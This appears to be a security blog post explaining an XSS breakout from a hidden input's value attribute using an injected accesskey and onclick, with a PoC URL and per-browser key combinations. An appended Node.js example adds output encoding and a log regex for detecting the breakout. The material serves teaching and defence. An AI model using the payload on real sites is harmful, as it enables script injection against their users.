I saw an XSS vulnerability today. The injection point is inside an input tag that carries the hidden attribute. The general situation is as follows:
<input type="hidden" name="returnurl" value="[USER INJECT]" />
The normal XSS should be:
http://victim/?value=" onclick="alert(document.domain)
But because this input is not displayed on the page, the commonly used onclick method does not work (how do you trigger onclick on a tag you cannot click?). The browser does, however, offer another handy attribute, accesskey, so we construct:
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />
The PoC is:
http://victim/?returnurl=" accesskey="X" onclick="alert(document.domain)
Different browsers trigger accesskey with different key combinations. The following is the summary from w3school:
So the key combinations that trigger the above XSS are:
Firefox: Shift+Alt+X (tested successfully)
Chrome: Alt+X (not tested successfully on the latest version of Chrome)
IE: Alt+X (not verified)
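The root cause is that the returnurl value is concatenated into the value="" attribute without HTML-attribute encoding, so the first " in the payload closes the attribute and the rest becomes new attributes. The following Node.js code is an added example, not part of the original post: it renders the hidden input both the vulnerable way and the fixed way, counts the attributes that result, and adds a log-side check for the quote-then-accesskey/on*= breakout pattern. Function names and the sample URLs are assumptions constructed for the example.

```javascript
// Added example (not from the original post): safe rendering of the hidden
// input and a defender-side check for the attribute-breakout pattern.
const ATTR_ESCAPES = { '&': '&amp;', '"': '&quot;', "'": '&#x27;', '<': '&lt;', '>': '&gt;' };

// HTML-attribute encoding: each character that could close a quoted value or
// start new markup is replaced, so the value can never grow extra attributes.
function escapeAttr(value) {
  return String(value).replace(/[&"'<>]/g, (ch) => ATTR_ESCAPES[ch]);
}

// How the vulnerable page behaves: raw concatenation into value="".
function renderHiddenInputUnsafe(returnurl) {
  return `<input type="hidden" name="returnurl" value="${returnurl}" />`;
}

// The fix: encode the value and keep the attribute double-quoted.
function renderHiddenInputSafe(returnurl) {
  return `<input type="hidden" name="returnurl" value="${escapeAttr(returnurl)}" />`;
}

// Lists the attribute names present on one rendered tag. With the breakout the
// unsafe render gains accesskey and onclick; the safe render keeps only three.
function attributeNames(tag) {
  const names = [];
  const re = /\s([A-Za-z][\w-]*)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Heuristic for request logs: a quote followed by a new attribute name such as
// accesskey= or on*= is the signature of this attribute breakout. It is a
// detection aid, not a substitute for encoding on output.
const BREAKOUT_RE = /["'][^"'<>]*\s(?:on\w+|accesskey)\s*=/i;

function queryParamBreaksOutOfAttribute(url, param) {
  const value = new URL(url).searchParams.get(param); // decodes %22, %20, ...
  return value !== null && BREAKOUT_RE.test(value);
}
```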